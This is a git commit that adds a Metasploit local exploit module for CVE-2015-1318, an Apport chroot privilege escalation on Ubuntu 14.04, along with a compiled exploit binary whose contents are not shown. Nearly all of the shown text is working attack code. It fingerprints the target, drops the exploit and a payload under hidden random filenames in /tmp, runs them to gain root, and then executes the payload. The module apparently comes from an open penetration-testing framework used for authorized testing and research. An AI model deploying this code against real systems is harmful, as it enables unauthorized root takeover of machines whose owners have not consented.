Add Apport chroot Privilege Escalation exploit

2018-01-12 07:25:35 +00:00 · 2018-01-12 07:25:35 +00:00 · 8bbffd20cd
parent e6c4fb1dab
commit 8bbffd20cd
2 changed files with 151 additions and 0 deletions
--- a/data/exploits/cve-2015-1318/newpid
+++ b/data/exploits/cve-2015-1318/newpid
--- a/modules/exploits/linux/local/apport_chroot_priv_esc.rb
+++ b/modules/exploits/linux/local/apport_chroot_priv_esc.rb
@ -0,0 +1,151 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::File
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Apport chroot Privilege Escalation',
+      'Description'    => %q{
+        This module attempts to gain root privileges on Ubuntu by invoking
+        the default coredump handler (Apport) inside a namespace ("container").
+
+        Apport versions 2.13 through 2.17.x before 2.17.1 on Ubuntu are
+        vulnerable (CVE-2015-1318), due to a feature which allows forwarding
+        reports to a container's Apport, causing usr/share/apport/apport
+        within the crashed task's directory to be executed. Apport does not
+        not drop privileges, resulting in code execution as root.
+
+        This module has been tested successfully on Apport 2.14.1
+        on Ubuntu 14.04.1 LTS x86 and x86_64.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Stéphane Graber', # Independent discovery, PoC and patch
+          'Tavis Ormandy', # Independent discovery and C exploit
+          'Ricardo F. Teixeira', # shell exploit
+          'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
+        ],
+      'DisclosureDate' => 'Mar 31 2015',
+      'Platform'       => [ 'linux'],
+      'Arch'           => [ ARCH_X86, ARCH_X64 ],
+      'SessionTypes'   => [ 'shell', 'meterpreter' ],
+      'Targets'        => [[ 'Auto', {} ]],
+      'References'     =>
+        [
+          [ 'EDB', '36782' ],
+          [ 'EDB', '36746' ],
+          [ 'CVE', '2015-1318' ],
+          [ 'URL', 'https://usn.ubuntu.com/usn/USN-2569-1/' ],
+          [ 'URL', 'http://www.openwall.com/lists/oss-security/2015/04/14/4' ],
+          [ 'URL', 'https://gist.github.com/taviso/0f02c255c13c5c113406' ],
+          [ 'URL', 'https://code.launchpad.net/~stgraber/apport/pidns-support/+merge/200893' ],
+          [ 'URL', 'https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1438758' ],
+          [ 'URL', 'http://bazaar.launchpad.net/~apport-hackers/apport/trunk/revision/2943' ]
+        ]
+    ))
+    register_options(
+      [
+        OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
+      ])
+  end
+
+  def check
+    res = cmd_exec 'apport-cli --version'
+
+    if res.blank?
+      vprint_error 'Apport is NOT installed'
+      return CheckCode::Safe
+    end
+
+    apport_version = Gem::Version.new res
+
+    if apport_version >= Gem::Version.new('2.13') && apport_version < Gem::Version.new('2.17.1')
+      vprint_good "Apport version #{apport_version} is vulnerable"
+    else
+      vprint_error "Apport version #{apport_version} is NOT vulnerable"
+      return CheckCode::Safe
+    end
+
+    os = cmd_exec 'grep ^ID= /etc/os-release'
+
+    if os.include? 'ID=ubuntu'
+      vprint_good 'Target operating system is Ubuntu'
+    else
+      vprint_error 'Target operating system is NOT supported'
+      return CheckCode::Safe
+    end
+
+    kernel_version = Gem::Version.new cmd_exec 'uname -r'
+
+    if kernel_version >= Gem::Version.new('3.12')
+      vprint_good "Linux kernel version #{kernel_version} is vulnerable"
+    else
+      vprint_error "Linux kernel version #{kernel_version} is NOT vulnerable"
+      return CheckCode::Safe
+    end
+
+    kernel_core_pattern = cmd_exec 'sysctl -a | grep core_pattern'
+
+    if kernel_core_pattern.include? 'apport'
+      vprint_good 'System is configured to use Apport for crash reporting'
+    else
+      vprint_error 'System is NOT configured to use Apport for crash reporting'
+      return CheckCode::Safe
+    end
+
+    CheckCode::Vulnerable
+  end
+
+  def upload_and_chmodx(path, data)
+    print_status "Writing '#{path}' (#{data.size} bytes) ..."
+    rm_f path
+    write_file path, data
+    cmd_exec "chmod +x '#{path}'"
+    register_file_for_cleanup path
+  end
+
+  def exploit
+    if check != CheckCode::Vulnerable
+      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
+    end
+
+    # Tavis Ormandy's exploit:
+    # - https://www.exploit-db.com/exploits/36746/
+    # Compiled on Ubuntu 14.04.1 LTS x86
+    path = ::File.join Msf::Config.data_directory, 'exploits', 'cve-2015-1318', 'newpid'
+    fd = ::File.open path, 'rb'
+    executable_data = fd.read fd.stat.size
+    fd.close
+
+    executable_name = ".#{rand_text_alphanumeric rand(5..10)}"
+    executable_path = "#{datastore['WritableDir']}/#{executable_name}"
+    upload_and_chmodx executable_path, executable_data
+
+    payload_name = ".#{rand_text_alphanumeric rand(5..10)}"
+    payload_path = "#{datastore['WritableDir']}/#{payload_name}"
+    upload_and_chmodx payload_path, generate_payload_exe
+
+    print_status 'Launching exploit...'
+    cmd_exec "cd #{datastore['WritableDir']}"
+    output = cmd_exec executable_path
+    output.each_line { |line| vprint_status line.chomp }
+
+    id = cmd_exec 'id'
+    unless id.include? 'root'
+      fail_with Failure::Unknown, 'Failed to gain root privileges'
+    end
+
+    print_good "Upgraded session to root privileges ('#{id}')"
+    vprint_status 'Executing payload...'
+    cmd_exec payload_path
+  end
+end